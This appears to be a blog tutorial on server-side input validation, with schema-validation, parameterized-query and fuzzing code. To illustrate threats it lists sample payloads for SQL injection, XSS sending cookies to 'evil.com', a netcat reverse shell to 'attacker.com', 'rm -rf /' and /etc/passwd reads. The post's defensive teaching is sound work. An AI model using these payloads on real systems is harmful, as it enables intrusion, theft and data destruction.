Eric Campbell 6 min read Security

Input Validation: Server-Side Sanitization

Every form with JavaScript validation creates a false sense of security. Developers see those red error messages and assume users can't submit malicious data. This assumption is catastrophically...

Key Insights

  • Client-side validation is a UX feature, not a security control—attackers bypass it trivially with tools like cURL or browser dev tools, making server-side sanitization your only real defense.
  • Validation (reject bad input), sanitization (clean dangerous input), and encoding (neutralize output) serve different purposes and should be layered together for defense-in-depth.
  • Schema validation libraries like Zod, Joi, or Pydantic centralize your validation logic, making it testable, maintainable, and consistent across your entire application.

Why Client-Side Validation Isn’t Enough

Every form with JavaScript validation creates a false sense of security. Developers see those red error messages and assume users can’t submit malicious data. This assumption is catastrophically wrong.

Client-side validation exists for user experience—providing instant feedback before a round trip to the server. It has zero security value. Anyone with basic technical knowledge can bypass it entirely.

Here’s how trivial it is to skip your carefully crafted frontend validation:

# Your JavaScript requires email format and 50-char max length
# An attacker doesn't care about your JavaScript

curl -X POST https://yourapp.com/api/users \
  -H "Content-Type: application/json" \
  -d '{"email": "<script>alert(document.cookie)</script>", "name": "'; DROP TABLE users; --"}'

The attacker never loads your page. They never execute your JavaScript. They send raw HTTP requests directly to your API. Your React form validation? Irrelevant. Your Vue input masks? Meaningless.

Adopt this mindset: all input is untrusted. Every request parameter, header, cookie, file upload, and URL segment could contain malicious data. Validate everything server-side, every time.

Types of Malicious Input

Understanding attack vectors helps you defend against them. Here are the most common threats your sanitization layer must handle:

SQL Injection manipulates database queries by injecting SQL syntax:

# Login bypass
username: admin' --
password: anything

# Data extraction
search: ' UNION SELECT username, password FROM users --

# Destructive payload
id: 1; DROP TABLE orders; --

Cross-Site Scripting (XSS) injects JavaScript that executes in victims’ browsers:

# Cookie theft
<script>fetch('https://evil.com/steal?c='+document.cookie)</script>

# DOM manipulation
<img src=x onerror="document.body.innerHTML='<h1>Hacked</h1>'">

# Event handler injection
" onmouseover="alert('XSS')" data-x="

Command Injection executes system commands when input reaches shell functions:

# Chained commands
filename: report.pdf; rm -rf /

# Command substitution
host: $(cat /etc/passwd)

# Pipe injection
input: | nc attacker.com 4444 -e /bin/sh

Path Traversal accesses files outside intended directories:

# Directory escape
file: ../../../etc/passwd

# Encoded traversal
path: ..%2F..%2F..%2Fetc%2Fpasswd

# Null byte injection (older systems)
document: ../../../etc/passwd%00.pdf

Validation vs. Sanitization vs. Encoding

These terms are often confused, but they serve distinct purposes:

Validation checks whether input meets expected criteria and rejects it if not. The data either passes or fails—there’s no modification. Use validation when you have strict format requirements.

Sanitization modifies input to remove or neutralize dangerous content. The data is cleaned rather than rejected. Use sanitization when you need to accept flexible input but must remove specific threats.

Encoding transforms data for safe use in a specific context. HTML encoding converts < to &lt; so it displays as text rather than being parsed as markup. Use encoding at output time, matched to the output context.

Defense-in-depth means applying all three:

  1. Validate incoming data against expected schemas
  2. Sanitize to remove known dangerous patterns
  3. Encode when rendering output in HTML, SQL, or shell contexts

No single layer is sufficient. SQL injection can slip past validation if you’re checking format but not content. XSS can survive sanitization if you miss an encoding vector. Layer your defenses.

Core Sanitization Techniques

Allowlisting beats denylisting. Define what’s permitted rather than trying to enumerate everything dangerous. Attackers constantly discover new bypass techniques; your denylist will always be incomplete.

import re
from typing import Optional

def sanitize_username(value: str) -> Optional[str]:
    """Allowlist approach: only permit safe characters."""
    if not value or len(value) > 30:
        return None
    
    # Only allow alphanumeric, underscore, hyphen
    if not re.match(r'^[a-zA-Z0-9_-]+$', value):
        return None
    
    return value.lower()

def sanitize_integer(value: str, min_val: int = 0, max_val: int = 10000) -> Optional[int]:
    """Type coercion with bounds checking."""
    try:
        num = int(value)
        if min_val <= num <= max_val:
            return num
    except (ValueError, TypeError):
        pass
    return None

// Node.js equivalents
function sanitizeUsername(value) {
  if (!value || typeof value !== 'string' || value.length > 30) {
    return null;
  }
  
  const pattern = /^[a-zA-Z0-9_-]+$/;
  if (!pattern.test(value)) {
    return null;
  }
  
  return value.toLowerCase();
}

function sanitizeHtml(input) {
  // Escape HTML entities - use for display, not storage
  const escapeMap = {
    '&': '&amp;',
    '<': '&lt;',
    '>': '&gt;',
    '"': '&quot;',
    "'": '&#x27;',
  };
  
  return input.replace(/[&<>"']/g, char => escapeMap[char]);
}

function sanitizePath(filename) {
  // Remove path traversal attempts, keep only basename
  return filename
    .replace(/\.\./g, '')
    .replace(/[\/\\]/g, '')
    .replace(/\0/g, ''); // null byte removal
}

Key techniques:

  • Type coercion: Convert strings to expected types (integers, booleans) and reject failures
  • Length limits: Enforce maximum lengths to prevent buffer-related issues and DoS
  • Regex patterns: Use anchored patterns (^...$) to validate entire strings
  • Character allowlists: Explicitly permit only safe character sets

Framework-Level Protections

Modern frameworks provide built-in protections. Use them—they’re battle-tested and maintained by security experts.

Parameterized queries prevent SQL injection by separating code from data:

# DANGEROUS: String concatenation
def get_user_unsafe(user_id: str):
    query = f"SELECT * FROM users WHERE id = '{user_id}'"
    cursor.execute(query)  # SQL injection vulnerable

# SAFE: Parameterized query
def get_user_safe(user_id: str):
    query = "SELECT * FROM users WHERE id = %s"
    cursor.execute(query, (user_id,))  # Parameter is escaped

# SAFE: ORM usage (SQLAlchemy)
def get_user_orm(user_id: int):
    return session.query(User).filter(User.id == user_id).first()

Template engine auto-escaping prevents XSS in rendered HTML:

# Jinja2 auto-escapes by default
# Template: <p>Hello, {{ username }}</p>
# Input: <script>alert('xss')</script>
# Output: <p>Hello, &lt;script&gt;alert('xss')&lt;/script&gt;</p>

# Only disable escaping when you explicitly trust content
# {{ trusted_html | safe }}  # Use with extreme caution

// React auto-escapes by default
function UserGreeting({ username }) {
  // This is safe - React escapes the content
  return <p>Hello, {username}</p>;
}

// DANGEROUS: dangerouslySetInnerHTML bypasses escaping
function UnsafeContent({ html }) {
  // Never use with untrusted input
  return <div dangerouslySetInnerHTML={{ __html: html }} />;
}

Building a Validation Layer

Centralize validation logic in middleware or dependencies. This ensures consistent enforcement and makes security audits straightforward.

Express.js with Zod:

import { z } from 'zod';

// Define schemas
const CreateUserSchema = z.object({
  email: z.string().email().max(255),
  username: z.string().min(3).max(30).regex(/^[a-zA-Z0-9_-]+$/),
  age: z.number().int().min(13).max(120).optional(),
});

// Validation middleware factory
function validate(schema) {
  return (req, res, next) => {
    const result = schema.safeParse(req.body);
    
    if (!result.success) {
      return res.status(400).json({
        error: 'Validation failed',
        details: result.error.issues,
      });
    }
    
    req.validated = result.data;
    next();
  };
}

// Usage in routes
app.post('/users', validate(CreateUserSchema), (req, res) => {
  // req.validated contains clean, typed data
  const user = createUser(req.validated);
  res.json(user);
});

FastAPI with Pydantic:

from fastapi import FastAPI, HTTPException
from pydantic import BaseModel, EmailStr, Field, field_validator
import re

app = FastAPI()

class CreateUserRequest(BaseModel):
    email: EmailStr
    username: str = Field(min_length=3, max_length=30)
    age: int | None = Field(default=None, ge=13, le=120)
    
    @field_validator('username')
    @classmethod
    def validate_username(cls, v: str) -> str:
        if not re.match(r'^[a-zA-Z0-9_-]+$', v):
            raise ValueError('Username contains invalid characters')
        return v.lower()

@app.post("/users")
async def create_user(user: CreateUserRequest):
    # Pydantic validates automatically before this runs
    # user object contains clean, typed data
    return {"email": user.email, "username": user.username}

Testing Your Defenses

Validation code requires testing like any other code—more so, because failures have security implications.

Fuzzing throws malformed and malicious input at your endpoints:

import requests
import random
import string

FUZZ_PAYLOADS = [
    # SQL injection
    "' OR '1'='1", "'; DROP TABLE users; --", "1 UNION SELECT * FROM users",
    # XSS
    "<script>alert(1)</script>", "<img src=x onerror=alert(1)>",
    # Command injection
    "; ls -la", "| cat /etc/passwd", "$(whoami)",
    # Path traversal
    "../../../etc/passwd", "....//....//etc/passwd",
    # Format strings
    "%s%s%s%s%s", "%x%x%x%x",
    # Overflow attempts
    "A" * 10000,
    # Null bytes
    "test\x00.pdf",
    # Unicode edge cases
    "\u0000", "\uFFFF", "Ā" * 1000,
]

def fuzz_endpoint(url: str, field: str):
    """Basic fuzzing for a single field."""
    results = []
    
    for payload in FUZZ_PAYLOADS:
        try:
            response = requests.post(
                url,
                json={field: payload},
                timeout=5
            )
            
            # Flag unexpected successes or errors
            if response.status_code == 500:
                results.append(f"SERVER ERROR with: {payload[:50]}")
            elif response.status_code == 200:
                results.append(f"ACCEPTED (check if sanitized): {payload[:50]}")
                
        except requests.exceptions.Timeout:
            results.append(f"TIMEOUT with: {payload[:50]}")
    
    return results

# Run against your endpoints
issues = fuzz_endpoint("http://localhost:8000/users", "username")
for issue in issues:
    print(issue)

Integrate automated scanning into CI/CD. OWASP ZAP provides API-driven security testing:

# GitHub Actions example
- name: OWASP ZAP Scan
  uses: zaproxy/action-full-scan@v0.8.0
  with:
    target: 'https://staging.yourapp.com'
    rules_file_name: '.zap/rules.tsv'

Server-side sanitization isn’t optional—it’s the foundation of application security. Validate strictly, sanitize defensively, encode contextually, and test relentlessly. Your users are trusting you with their data. Don’t let them down.

Liked this? There's more.

Every week: one practical technique, explained simply, with code you can use immediately.